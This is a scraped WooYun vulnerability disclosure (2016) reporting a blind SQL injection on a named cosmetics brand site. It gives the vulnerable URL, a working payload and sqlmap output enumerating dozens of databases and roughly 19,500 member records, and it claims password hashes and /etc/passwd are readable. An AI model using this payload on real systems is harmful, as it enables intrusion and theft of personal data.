立白旗下某品牌网站存在SQL注入漏洞（涉及多个数据库）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0177171

漏洞标题：立白旗下某品牌网站存在SQL注入漏洞（涉及多个数据库）

漏洞作者： pudding2

提交时间：2016-02-20 08:08

修复时间：2016-02-25 08:10

公开时间：2016-02-25 08:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-02-20：细节已通知厂商并且等待厂商处理中
2016-02-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

立白旗下某品牌网站存在SQL注入漏洞（涉及多个数据库）

详细说明：

高姿化妆品有限公司具有20多年的发展历史，是中国日化行业知名的化妆品企业。
公司以其稳定的产品质量获得了广大消费者的信赖和好评。2006年公司与立白集团进行了资产重组，在激烈竞争的化妆品市场诞生了上海新高姿化妆品有限公司。

漏洞URL:http://www.cogi.cn/pcat.php?pcat=1 (GET)
立白旗下高资网站存在SQL注入漏洞（涉及多个数据库）

---
Parameter: pcat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pcat=1 AND 6422=6422
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.12
back-end DBMS: MySQL 5
current user:    'root@localhost'
current database:    'db_cogi'
current user is DBA:    True

涉及多个数据库

Database: sms_3
[6 tables]
+----------------------------------------------+
| sms_clients                                  |
| sms_kv                                       |
| sms_news                                     |
| sms_picture                                  |
| sms_show                                     |
| sms_user                                     |
+----------------------------------------------+
Database: hrapp
[14 tables]
+----------------------------------------------+
| ad_access                                    |
| ad_admin                                     |
| ad_field                                     |
| ad_input                                     |
| ad_model                                     |
| ad_node                                      |
| ad_order                                     |
| ad_photo                                     |
| ad_photo_like                                |
| ad_question                                  |
| ad_role                                      |
| ad_role_admin                                |
| ad_test                                      |
| ad_user                                      |
+----------------------------------------------+
Database: hikalimedia
[5 tables]
+----------------------------------------------+
| hik_category                                 |
| hik_kvlist                                   |
| hik_product                                  |
| hik_thumb                                    |
| hik_user                                     |
+----------------------------------------------+
Database: cogi
[2 tables]
+----------------------------------------------+
| cogi_register                                |
| cogi_user                                    |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+
Database: cat_maxmara_150624
[22 tables]
+----------------------------------------------+
| cms_article                                  |
| cms_article_cate                             |
| cms_material                                 |
| mar_action                                   |
| mar_bag                                      |
| mar_banner                                   |
| mar_city                                     |
| mar_classify                                 |
| mar_cloths                                   |
| mar_lastvideo                                |
| mar_shop                                     |
| mar_video                                    |
| mar_word                                     |
| shop_organization                            |
| sys_company                                  |
| sys_log                                      |
| sys_permission                               |
| sys_role                                     |
| sys_role_permission                          |
| sys_user                                     |
| sys_user_role                                |
| sys_welcome                                  |
+----------------------------------------------+
Database: smartdb
[5 tables]
+----------------------------------------------+
| smart_case                                   |
| smart_category                               |
| smart_consulting                             |
| smart_dynamic                                |
| smart_user                                   |
+----------------------------------------------+
Database: zhoudafu
[4 tables]
+----------------------------------------------+
| zdf_admin                                    |
| zdf_blesses                                  |
| zdf_modules                                  |
| zdf_users                                    |
+----------------------------------------------+
Database: elle_db_a
[7 tables]
+----------------------------------------------+
| calendars                                    |
| kvimage                                      |
| mybenefits                                   |
| mybenefitsaddress                            |
| styles                                       |
| styles4pic                                   |
| userinfo                                     |
+----------------------------------------------+
Database: vendor3
[19 tables]
+----------------------------------------------+
| module                                       |
| category                                     |
| comment                                      |
| content3                                     |
| contentindex                                 |
| greetingcard                                 |
| log                                          |
| manager                                      |
| member                                       |
| menu                                         |
| module_field                                 |
| schools                                      |
| serviceorders                                |
| sessionvalue                                 |
| spider_log                                   |
| typelist                                     |
| usergroup                                    |
| webconfig                                    |
| webconfig_param                              |
+----------------------------------------------+
Database: zphome
[159 tables]
+----------------------------------------------+
| TABLE 106                                    |
| a_admin                                      |
| a_modules                                    |
| a_projects                                   |
| adidas1309_photos                            |
| aha_admin                                    |
| aha_anwsers                                  |
| aha_ranks                                    |
| aha_results                                  |
| aha_shares                                   |
| aha_stageanswers                             |
| aha_users                                    |
| artistry151012                               |
| banggo4_codes                                |
| banggo4_prizes                               |
| banggo4_scores                               |
| banggo_admin                                 |
| banggo_blocks                                |
| banggo_data                                  |
| banggo_daygifts                              |
| banggo_gameinfos                             |
| banggo_gifts                                 |
| banggo_modules                               |
| banggo_questions                             |
| banggo_settings                              |
| banggo_tasks                                 |
| banggo_transactions                          |
| banggo_userexchanges                         |
| banggo_usergifts                             |
| banggo_users                                 |
| banggo_usertasks                             |
| chanel0611_admin                             |
| chanel0611_modules                           |
| chanel0611_photos                            |
| christmas_admin                              |
| christmas_goods                              |
| christmas_modules                            |
| christmas_photos                             |
| cms_categories                               |
| cms_comments                                 |
| cms_extend                                   |
| cms_meta                                     |
| cms_page_meta                                |
| cms_pages                                    |
| cms_post_meta                                |
| cms_posts                                    |
| cms_sessions                                 |
| cms_users                                    |
| cogiegg_admin                                |
| cogiegg_breaks                               |
| cogiegg_gifts                                |
| cogiegg_modules                              |
| cogiegg_prizes                               |
| cogiegg_users                                |
| dove130531_userimages                        |
| dove130531_users                             |
| edm_users                                    |
| esteelauder1403_photos                       |
| esteelauder1403_votes                        |
| helena_register                              |
| helena_user                                  |
| hr_white_users                               |
| lavenue_active                               |
| lavenue_brand                                |
| lavenue_category                             |
| lavenue_club                                 |
| lavenue_newopen                              |
| lavenue_news                                 |
| lavenue_register                             |
| lavenue_thumb                                |
| lavenue_user                                 |
| lavenue_vedio                                |
| loreal100_admin                              |
| loreal100_adminmodules                       |
| loreal100_users                              |
| loreal100_votes                              |
| lux1304_admin                                |
| lux1304_blackips                             |
| lux1304_cards                                |
| lux1304_cards_001                            |
| lux1304_modules                              |
| lux1304_offlines                             |
| lux1304_shares                               |
| lux1304_tests_001                            |
| lux1304_tests_new                            |
| lux1304_users                                |
| lux1304_users_001                            |
| lux1304_users_002                            |
| lux1304_users_003                            |
| mascara_users                                |
| maxmara0428_register                         |
| maxmara0428_user                             |
| maxmara150512                                |
| maxmara_prize                                |
| maxmara_register                             |
| maxmara_registerprize                        |
| maxmara_score                                |
| maxmara_user                                 |
| maxmara_webconfig                            |
| maxmara_winaprize                            |
| maxus0820_admin                              |
| maxus0820_ci_sessions                        |
| maxus0820_config_common                      |
| maxus0820_config_site                        |
| maxus0820_config_site_admin                  |
| maxus0820_model                              |
| maxus0820_power                              |
| maxus0820_power_group                        |
| maxus0820_vote                               |
| mrts_wechat_0                                |
| neiman_votes                                 |
| nzj_register                                 |
| nzj_user                                     |
| nzj_vote                                     |
| oreal0721_admin                              |
| oreal0721_candidate_info                     |
| oreal0721_ci_sessions                        |
| oreal0721_config_common                      |
| oreal0721_config_site                        |
| oreal0721_config_site_admin                  |
| oreal0721_power                              |
| oreal0721_power_group                        |
| oreal0721_vote_log                           |
| prodigycream_users                           |
| pt0819                                       |
| pt1225_prd                                   |
| pt1225_vote                                  |
| restylane1304_admin                          |
| restylane1304_modules                        |
| restylane1304_smiles                         |
| restylane1304_tips                           |
| restylane1304_userimages                     |
| restylane1304_users                          |
| restylane1304_votes                          |
| sheep_userimages                             |
| sheep_users                                  |
| sheep_votes                                  |
| shj2012_users                                |
| siemens_blesses                              |
| tiffany1403_votes                            |
| whiteadmin                                   |
| whiteuserinfo                                |
| whiteusers                                   |
| whiteusertips                                |
| yvesrocher_users                             |
| zdf_admin                                    |
| zdf_blesses                                  |
| zdf_modules                                  |
| zdf_users                                    |
| zdfu_prize                                   |
| zdfu_register                                |
| zdfu_registerprize                           |
| zdfu_score                                   |
| zdfu_user                                    |
| zdfu_webconfig                               |
| zdfu_winaprize                               |
| zippo151121_code                             |
| zippo151121_lottery                          |
| zippo151121_user                             |
+----------------------------------------------+
Database: test
[7 tables]
+----------------------------------------------+
| calendars                                    |
| kvimage                                      |
| mybenefits                                   |
| mybenefitsaddress                            |
| styles                                       |
| styles4pic                                   |
| userinfo                                     |
+----------------------------------------------+
Database: v6_hr
[3 tables]
+----------------------------------------------+
| customer                                     |
| first_five_invit                             |
| regular_customer                             |
+----------------------------------------------+
Database: style_business
[17 tables]
+----------------------------------------------+
| ds_brand                                     |
| ds_category                                  |
| ds_colour                                    |
| ds_deliveryaddress                           |
| ds_emailtemplate                             |
| ds_excandpro                                 |
| ds_exclusive                                 |
| ds_homepage                                  |
| ds_homepagepro                               |
| ds_message                                   |
| ds_messagetype                               |
| ds_orders                                    |
| ds_product                                   |
| ds_register                                  |
| ds_shoppingcart                              |
| ds_thumb                                     |
| ds_user                                      |
+----------------------------------------------+
Database: kc_db
[6 tables]
+----------------------------------------------+
| kc_clients                                   |
| kc_kv                                        |
| kc_news                                      |
| kc_picture                                   |
| kc_show                                      |
| kc_user                                      |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_BUFFER_PAGE                           |
| INNODB_BUFFER_PAGE_LRU                       |
| INNODB_BUFFER_POOL_STATS                     |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+
Database: iaactdb
[6 tables]
+----------------------------------------------+
| iaact_clients                                |
| iaact_kv                                     |
| iaact_news                                   |
| iaact_picture                                |
| iaact_show                                   |
| iaact_user                                   |
+----------------------------------------------+
Database: johnhenry
[5 tables]
+----------------------------------------------+
| archive_coupon                               |
| archive_register                             |
| archive_registercoupon                       |
| archive_user                                 |
| archive_webconfig                            |
+----------------------------------------------+
Database: db_cogi
[9 tables]
+----------------------------------------------+
| tb_article                                   |
| tb_media                                     |
| tb_menber                                    |
| tb_pcat                                      |
| tb_prd                                       |
| tb_pseries                                   |
| tb_star                                      |
| tb_trend                                     |
| tb_user                                      |
+----------------------------------------------+
Database: asus100
[7 tables]
+----------------------------------------------+
| asus_hobbytype                               |
| asus_person                                  |
| asus_picture                                 |
| asus_user                                    |
| asus_usertype                                |
| asus_weibomsg                                |
| asus_weibotype                               |
+----------------------------------------------+
Database: wechatcms
[283 tables]
+----------------------------------------------+
| hr_admin                                     |
| hr_details                                   |
| hr_gifts                                     |
| hr_orders                                    |
| hr_users                                     |
| pigcms_access                                |
| pigcms_activity                              |
| pigcms_adma                                  |
| pigcms_alipay_config                         |
| pigcms_api                                   |
| pigcms_areply                                |
| pigcms_attribute                             |
| pigcms_autumns_box                           |
| pigcms_autumns_ip                            |
| pigcms_autumns_open                          |
| pigcms_banners                               |
| pigcms_behavior                              |
| pigcms_broker                                |
| pigcms_broker_client                         |
| pigcms_broker_commission                     |
| pigcms_broker_item                           |
| pigcms_broker_optionlog                      |
| pigcms_broker_translation                    |
| pigcms_broker_user                           |
| pigcms_busines                               |
| pigcms_busines_comment                       |
| pigcms_busines_main                          |
| pigcms_busines_pic                           |
| pigcms_busines_second                        |
| pigcms_car                                   |
| pigcms_car_utility                           |
| pigcms_carmodel                              |
| pigcms_carnews                               |
| pigcms_carowner                              |
| pigcms_carsaler                              |
| pigcms_carseries                             |
| pigcms_carset                                |
| pigcms_caruser                               |
| pigcms_case                                  |
| pigcms_caseclass                             |
| pigcms_catemenu                              |
| pigcms_classify                              |
| pigcms_company                               |
| pigcms_company_staff                         |
| pigcms_crowdfunding                          |
| pigcms_crowdfunding_focus                    |
| pigcms_crowdfunding_order                    |
| pigcms_crowdfunding_reward                   |
| pigcms_custom_field                          |
| pigcms_custom_info                           |
| pigcms_custom_limit                          |
| pigcms_custom_set                            |
| pigcms_dining_table                          |
| pigcms_dish                                  |
| pigcms_dish_company                          |
| pigcms_dish_like                             |
| pigcms_dish_order                            |
| pigcms_dish_sort                             |
| pigcms_dish_table                            |
| pigcms_dishout_manage                        |
| pigcms_dishout_salelog                       |
| pigcms_diyform                               |
| pigcms_diyform_set                           |
| pigcms_diymen_class                          |
| pigcms_diymen_set                            |
| pigcms_dream                                 |
| pigcms_estate                                |
| pigcms_estate_album                          |
| pigcms_estate_expert                         |
| pigcms_estate_housetype                      |
| pigcms_estate_impress                        |
| pigcms_estate_impress_add                    |
| pigcms_estate_nav                            |
| pigcms_estate_son                            |
| pigcms_files                                 |
| pigcms_flash                                 |
| pigcms_forum_comment                         |
| pigcms_forum_config                          |
| pigcms_forum_message                         |
| pigcms_forum_topics                          |
| pigcms_funclass                              |
| pigcms_function                              |
| pigcms_funintro                              |
| pigcms_game_config                           |
| pigcms_game_records                          |
| pigcms_games                                 |
| pigcms_greeting_card                         |
| pigcms_helping                               |
| pigcms_helping_user                          |
| pigcms_home                                  |
| pigcms_home_background                       |
| pigcms_host                                  |
| pigcms_host_list_add                         |
| pigcms_host_order                            |
| pigcms_hotels_house                          |
| pigcms_hotels_house_sort                     |
| pigcms_hotels_image                          |
| pigcms_hotels_order                          |
| pigcms_images                                |
| pigcms_img                                   |
| pigcms_img_multi                             |
| pigcms_indent                                |
| pigcms_invite                                |
| pigcms_invite_enroll                         |
| pigcms_invite_meeting                        |
| pigcms_invite_partner                        |
| pigcms_invite_plan                           |
| pigcms_invite_user                           |
| pigcms_keyword                               |
| pigcms_leave                                 |
| pigcms_links                                 |
| pigcms_live                                  |
| pigcms_live_company                          |
| pigcms_live_content                          |
| pigcms_lottery                               |
| pigcms_lottery_cheat                         |
| pigcms_lottery_record                        |
| pigcms_market                                |
| pigcms_market_area                           |
| pigcms_market_cate                           |
| pigcms_market_nav                            |
| pigcms_market_park                           |
| pigcms_market_slide                          |
| pigcms_medical_set                           |
| pigcms_medical_user                          |
| pigcms_member                                |
| pigcms_member_card_contact                   |
| pigcms_member_card_coupon                    |
| pigcms_member_card_coupon_record             |
| pigcms_member_card_create                    |
| pigcms_member_card_custom                    |
| pigcms_member_card_exchange                  |
| pigcms_member_card_focus                     |
| pigcms_member_card_gifts                     |
| pigcms_member_card_info                      |
| pigcms_member_card_integral                  |
| pigcms_member_card_notice                    |
| pigcms_member_card_pay_record                |
| pigcms_member_card_set                       |
| pigcms_member_card_sign                      |
| pigcms_member_card_use_record                |
| pigcms_member_card_vip                       |
| pigcms_mobilesite                            |
| pigcms_moopha_article                        |
| pigcms_moopha_attachement                    |
| pigcms_moopha_channel                        |
| pigcms_moopha_channel_contentattribute       |
| pigcms_moopha_keywords                       |
| pigcms_moopha_picture                        |
| pigcms_moopha_site                           |
| pigcms_moopha_template                       |
| pigcms_moopha_user                           |
| pigcms_msg                                   |
| pigcms_nearby_user                           |
| pigcms_news                                  |
| pigcms_node                                  |
| pigcms_norms                                 |
| pigcms_notice_record                         |
| pigcms_ordering_class                        |
| pigcms_ordering_set                          |
| pigcms_orderprinter                          |
| pigcms_other                                 |
| pigcms_panorama                              |
| pigcms_photo                                 |
| pigcms_photo_list                            |
| pigcms_photo_log                             |
| pigcms_platform_pay                          |
| pigcms_popularity                            |
| pigcms_popularity_prize                      |
| pigcms_popularity_share                      |
| pigcms_popularity_user                       |
| pigcms_present                               |
| pigcms_problem_game                          |
| pigcms_problem_option                        |
| pigcms_problem_question                      |
| pigcms_problem_question_log                  |
| pigcms_problem_user                          |
| pigcms_product                               |
| pigcms_product_attribute                     |
| pigcms_product_cart                          |
| pigcms_product_cart_list                     |
| pigcms_product_cat                           |
| pigcms_product_comment                       |
| pigcms_product_detail                        |
| pigcms_product_diningtable                   |
| pigcms_product_group                         |
| pigcms_product_image                         |
| pigcms_product_mail_price                    |
| pigcms_product_relation                      |
| pigcms_product_setting                       |
| pigcms_punish                                |
| pigcms_punish_item                           |
| pigcms_qcloud_sendout                        |
| pigcms_qcloud_user                           |
| pigcms_question_bank                         |
| pigcms_recipe                                |
| pigcms_recognition                           |
| pigcms_red_packet                            |
| pigcms_red_packet_exchange                   |
| pigcms_red_packet_log                        |
| pigcms_red_packet_prize                      |
| pigcms_red_packet_reward                     |
| pigcms_renew                                 |
| pigcms_reply                                 |
| pigcms_reply_info                            |
| pigcms_requestdata                           |
| pigcms_research                              |
| pigcms_research_answer                       |
| pigcms_research_question                     |
| pigcms_research_result                       |
| pigcms_reservation                           |
| pigcms_reservebook                           |
| pigcms_role                                  |
| pigcms_role_user                             |
| pigcms_router                                |
| pigcms_router_config                         |
| pigcms_school_cat                            |
| pigcms_school_classify                       |
| pigcms_school_score                          |
| pigcms_school_set_index                      |
| pigcms_school_students                       |
| pigcms_school_tcourse                        |
| pigcms_school_teachers                       |
| pigcms_seckill_action                        |
| pigcms_seckill_base_shop                     |
| pigcms_seckill_book                          |
| pigcms_seckill_share                         |
| pigcms_seckill_shop_thum                     |
| pigcms_seckill_users                         |
| pigcms_selfform                              |
| pigcms_selfform_input                        |
| pigcms_selfform_value                        |
| pigcms_send_message                          |
| pigcms_share                                 |
| pigcms_share_set                             |
| pigcms_sign_conf                             |
| pigcms_sign_in                               |
| pigcms_sign_set                              |
| pigcms_site_plugmenu                         |
| pigcms_sms_code                              |
| pigcms_sms_expendrecord                      |
| pigcms_sms_record                            |
| pigcms_snccode                               |
| pigcms_store_flash                           |
| pigcms_styleset                              |
| pigcms_system_info                           |
| pigcms_taobao                                |
| pigcms_tempmsg                               |
| pigcms_text                                  |
| pigcms_token_open                            |
| pigcms_twitter_count                         |
| pigcms_twitter_log                           |
| pigcms_twitter_remove                        |
| pigcms_twitter_set                           |
| pigcms_unitary                               |
| pigcms_unitary_cart                          |
| pigcms_unitary_lucknum                       |
| pigcms_unitary_order                         |
| pigcms_unitary_user                          |
| pigcms_update_record                         |
| pigcms_upyun_attachement                     |
| pigcms_user                                  |
| pigcms_user_group                            |
| pigcms_user_request                          |
| pigcms_userinfo                              |
| pigcms_users                                 |
| pigcms_voiceresponse                         |
| pigcms_vote                                  |
| pigcms_vote_item                             |
| pigcms_vote_record                           |
| pigcms_weather                               |
| pigcms_wecha_user                            |
| pigcms_wechat_group                          |
| pigcms_wechat_group_list                     |
| pigcms_wechat_scene                          |
| pigcms_wecht_grout                           |
| pigcms_wedding                               |
| pigcms_wedding_info                          |
| pigcms_wehcat_member_enddate                 |
| pigcms_wxuser                                |
| pigcms_yeepay_tmp                            |
| pigcms_zhida                                 |
| tp_system_info                               |
+----------------------------------------------+
Database: techpool
[16 tables]
+----------------------------------------------+
| meet_answer                                  |
| meet_guestinfo                               |
| meet_invite                                  |
| meet_meetingguestrelation                    |
| meet_meetinginfo                             |
| meet_meetingplace                            |
| meet_meetingtype                             |
| meet_meetinguserrelation                     |
| meet_news                                    |
| meet_optionresult                            |
| meet_question                                |
| meet_schedule                                |
| meet_talentplan                              |
| meet_user                                    |
| meet_userinfo                                |
| meet_userloginfo                             |
+----------------------------------------------+
Database: web0
[13 tables]
+----------------------------------------------+
| ad_access                                    |
| ad_admin                                     |
| ad_field                                     |
| ad_input                                     |
| ad_model                                     |
| ad_node                                      |
| ad_order                                     |
| ad_photo                                     |
| ad_photo_like                                |
| ad_question                                  |
| ad_role                                      |
| ad_role_admin                                |
| ad_user                                      |
+----------------------------------------------+
Database: tianpu
[27 tables]
+----------------------------------------------+
| cms_article                                  |
| cms_article_cate                             |
| cms_material                                 |
| hos_article                                  |
| hos_comment                                  |
| hos_conference                               |
| hos_guide                                    |
| hos_newspper                                 |
| hos_notice_contributors                      |
| hos_subject                                  |
| hos_time                                     |
| hos_time_newspper                            |
| hos_transshipment                            |
| hos_video                                    |
| hos_video_type                               |
| hos_writer                                   |
| hos_writer_type                              |
| hos_year                                     |
| shop_organization                            |
| sys_company                                  |
| sys_log                                      |
| sys_permission                               |
| sys_role                                     |
| sys_role_permission                          |
| sys_user                                     |
| sys_user_role                                |
| sys_welcome                                  |
+----------------------------------------------+
Database: appnice
[26 tables]
+----------------------------------------------+
| admin                                        |
| api_access                                   |
| api_keys                                     |
| api_limits                                   |
| api_logs                                     |
| api_tokens                                   |
| comments                                     |
| config_common                                |
| config_site                                  |
| config_site_admin                            |
| integrals                                    |
| labels                                       |
| labels2stores                                |
| messages                                     |
| operates                                     |
| photos                                       |
| power                                        |
| power_group                                  |
| push_logs                                    |
| recommend_type                               |
| sources                                      |
| stores                                       |
| tags                                         |
| thesaurus                                    |
| tops                                         |
| users                                        |
+----------------------------------------------+
Database: vendor_a
[6 tables]
+----------------------------------------------+
| forte06_greetingcard                         |
| forte06_manager                              |
| forte06_menu                                 |
| forte06_usergroup                            |
| forte06_webconfig                            |
| forte06_webconfig_param                      |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: hrapp_crowdfunding2016
[15 tables]
+----------------------------------------------+
| ad_access                                    |
| ad_admin                                     |
| ad_field                                     |
| ad_input                                     |
| ad_model                                     |
| ad_node                                      |
| ad_order                                     |
| ad_order_pay_detail                          |
| ad_paytest                                   |
| ad_photo                                     |
| ad_product                                   |
| ad_question                                  |
| ad_role                                      |
| ad_role_admin                                |
| ad_user                                      |
+----------------------------------------------+
Database: vendor1
[36 tables]
+----------------------------------------------+
| elle0811_members                             |
| elle0811_users                               |
| elle0811_votes                               |
| forte150521_awards                           |
| forte150521_draws                            |
| forte150521_userinfos                        |
| forte150521_users                            |
| forte150921_cities                           |
| forte150921_donates                          |
| forte150921_members                          |
| forte150921_projects                         |
| forte150921_userinfos                        |
| forte150921_users                            |
| honda0720_likes                              |
| honda0720_photos                             |
| honda0720_users                              |
| hr150211_messages                            |
| hr150211_users                               |
| lavenue_active                               |
| lavenue_brand                                |
| lavenue_category                             |
| lavenue_club                                 |
| lavenue_newopen                              |
| lavenue_news                                 |
| lavenue_register                             |
| lavenue_thumb                                |
| lavenue_user                                 |
| lavenue_vedio                                |
| techpool_meetings                            |
| techpool_members                             |
| techpool_signs                               |
| techpool_users                               |
| zippo_codes                                  |
| zippo_members                                |
| zippo_users                                  |
| zippo_votes                                  |
+----------------------------------------------+
Database: styletv
[4 tables]
+----------------------------------------------+
| tb_bindaccount                               |
| tb_generalize                                |
| tb_sysinfo                                   |
| tb_user                                      |
+----------------------------------------------+
Database: acense
[3 tables]
+----------------------------------------------+
| dolls                                        |
| migrations                                   |
| tools                                        |
+----------------------------------------------+
Database: vendor5
[24 tables]
+----------------------------------------------+
| 360_categories_entries                       |
| 360_categories                               |
| 360_category_groups                          |
| 360_content_field_types                      |
| 360_content_fields                           |
| 360_content_types_admin_groups               |
| 360_content_types                            |
| 360_entries_data                             |
| 360_entries                                  |
| 360_galleries                                |
| 360_gallery_images                           |
| 360_groups                                   |
| 360_navigation_items                         |
| 360_navigations                              |
| 360_product_forward                          |
| 360_product_post                             |
| 360_product                                  |
| 360_publish_logs                             |
| 360_revision_resource_types                  |
| 360_revisions                                |
| 360_settings                                 |
| 360_snippets                                 |
| 360_users                                    |
| 360_weibo_user                               |
+----------------------------------------------+
Database: vendor4
[40 tables]
+----------------------------------------------+
| module                                       |
| advert                                       |
| category                                     |
| comment                                      |
| content29                                    |
| content3                                     |
| content30                                    |
| content31                                    |
| content32                                    |
| content33                                    |
| contentindex                                 |
| log                                          |
| manager                                      |
| member                                       |
| menu                                         |
| mlqs_category                                |
| mlqs_comment                                 |
| mlqs_content3                                |
| mlqs_contentindex                            |
| mlqs_log                                     |
| mlqs_manager                                 |
| mlqs_member                                  |
| mlqs_menu                                    |
| mlqs_module                                  |
| mlqs_module_field                            |
| mlqs_schools                                 |
| mlqs_sessionvalue                            |
| mlqs_spider_log                              |
| mlqs_typelist                                |
| mlqs_usergroup                               |
| mlqs_webconfig                               |
| mlqs_webconfig_param                         |
| mlqs_weekresult                              |
| module_field                                 |
| schools                                      |
| spider_log                                   |
| typelist                                     |
| usergroup                                    |
| webconfig                                    |
| webconfig_param                              |
+----------------------------------------------+
Database: cat_money
[47 tables]
+----------------------------------------------+
| cms_article                                  |
| cms_article_cate                             |
| cms_material                                 |
| man_advertise                                |
| man_advertise_audit                          |
| man_advice                                   |
| man_bankcard                                 |
| man_banner                                   |
| man_bill                                     |
| man_borrower                                 |
| man_buyinfo                                  |
| man_check                                    |
| man_credite                                  |
| man_credite_bag                              |
| man_dart_get                                 |
| man_dart_send                                |
| man_dart_week                                |
| man_dictionary                               |
| man_exception                                |
| man_export                                   |
| man_firstbanner                              |
| man_formula                                  |
| man_hold_image                               |
| man_interest                                 |
| man_often_quest                              |
| man_page                                     |
| man_pay_order                                |
| man_pro_crbag                                |
| man_product_lock                             |
| man_product_nolock                           |
| man_profit                                   |
| man_profit_info                              |
| man_push                                     |
| man_recharge                                 |
| man_redeem                                   |
| man_subscribe                                |
| man_trade                                    |
| man_user                                     |
| shop_organization                            |
| sys_company                                  |
| sys_log                                      |
| sys_permission                               |
| sys_role                                     |
| sys_role_permission                          |
| sys_user                                     |
| sys_user_role                                |
| sys_welcome                                  |
+----------------------------------------------+
Database: cat_iself
[26 tables]
+----------------------------------------------+
| cms_article                                  |
| cms_article_cate                             |
| cms_material                                 |
| is_area                                      |
| is_check                                     |
| is_city                                      |
| is_collect                                   |
| is_custom                                    |
| is_like                                      |
| is_privilege                                 |
| is_product                                   |
| is_season_action                             |
| is_shop                                      |
| is_travel                                    |
| is_tripInfo                                  |
| is_user                                      |
| is_user_like                                 |
| shop_organization                            |
| sys_company                                  |
| sys_log                                      |
| sys_permission                               |
| sys_role                                     |
| sys_role_permission                          |
| sys_user                                     |
| sys_user_role                                |
| sys_welcome                                  |
+----------------------------------------------+

高资会员账号信息近2万条

Database: db_cogi
+------------+---------+
| Table      | Entries |
+------------+---------+
| tb_menber  | 19522   |
| tb_prd     | 227     |
| tb_media   | 101     |
| tb_trend   | 88      |
| tb_pseries | 32      |
| tb_pcat    | 19      |
| tb_article | 4       |
| tb_star    | 2       |
| tb_user    | 2       |
+------------+---------+

可读取/etc/passwd文件

漏洞证明：

多个数据库用户密码可读取

数据库root用户密码可通过cmd5获取

修复方案：

过滤，并修改数据库密码

版权声明：转载请注明来源 pudding2@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-02-25 08:10

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0177171

漏洞标题：立白旗下某品牌网站存在SQL注入漏洞（涉及多个数据库）

相关厂商：广州立白企业集团有限公司

漏洞作者： pudding2

提交时间：2016-02-20 08:08

修复时间：2016-02-25 08:10

公开时间：2016-02-25 08:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 pudding2@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0177171

漏洞标题：立白旗下某品牌网站存在SQL注入漏洞（涉及多个数据库）

相关厂商：广州立白企业集团有限公司

漏洞作者： pudding2

提交时间：2016-02-20 08:08

修复时间：2016-02-25 08:10

公开时间：2016-02-25 08:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0177171"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 pudding2@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：